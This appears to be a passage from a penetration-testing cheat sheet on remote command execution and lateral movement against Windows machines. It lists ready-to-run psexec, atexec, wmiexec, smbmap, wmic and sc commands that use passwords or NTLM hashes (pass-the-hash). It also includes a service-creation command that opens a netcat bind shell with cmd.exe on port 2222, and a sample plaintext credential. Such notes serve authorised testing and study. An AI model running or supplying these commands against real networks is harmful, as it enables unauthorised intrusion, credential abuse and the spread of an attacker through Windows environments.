With username/password

With psex­ec (Pre­req­ui­sites: ADMIN$ share is avail­able, the user is part of the local admin­is­tra­tor group on the target)

• On Lin­ux
  psexec.py Domain.local/User@$target cmd.exe
• On Win­dows
  • If you have user­name and pass­word
    ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
  • If you have a TGS stored in klist
    ./PsExec64.exe \\FILES04 cmd

With psex­ec via Metasploit

use exploit/windows/smb/psexec

With atex­ec (Impack­et)

atexec.py dom/user:pass@$target cmd.exe

With wmiex­ec

wmiexec.py domain.local/$target:$password@$ip

With Smbmap

smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target

With Wmic (To run a com­mand on mul­ti­ple sys­tems, replace /node:… with /node:@hosts.txt and add the tar­gets into this files.)

wmic /node:$target /user:$user /password:$password process call create $your_command

Via the SC Ser­vice Con­troller (This con­nects to the $tar­get via SMB and cre­ates then a ser­vice and starts them. Cau­tion: The ser­vice will be killed after 30 sec­onds because it prob­a­bly does­n’t con­form to the ser­vice stan­dard and calls the ser­vice API. Go around via call­ing cmd.exe /k real.exe and let it start the mali­cious process.)

net use \\$target $password /u:$domain\$user
sc \\$target create $servicename binpath= "cmd.exe /k c:\temp\nc.exe -l -p 2222 -e cmd.exe"
sc \\$target start $servicename

With username / hash

With pth-winexe: (Note: The user’s for­mat is user:lm:ntml — but pth-winexe actu­al­ly needs only the NTML hash here, but won’t work if no LM hash is giv­en. Because some­times no LM hash is avail­able, it is ok to sim­ply use a ran­dom LM hash like here.)

pth-winexe -U $user%aad3b435b51404eeaad3b435b51404ee:$NTML //$target cmd

With wmiex­ec (Require­ment: The tar­get has the admin share ADMIN$ avail­able and on the local sys­tem, the user needs local admin­is­tra­tor privileges.)

impacket-wmiexec -hashes :aad3b435b51404eeaad3b435b51404ee user@$target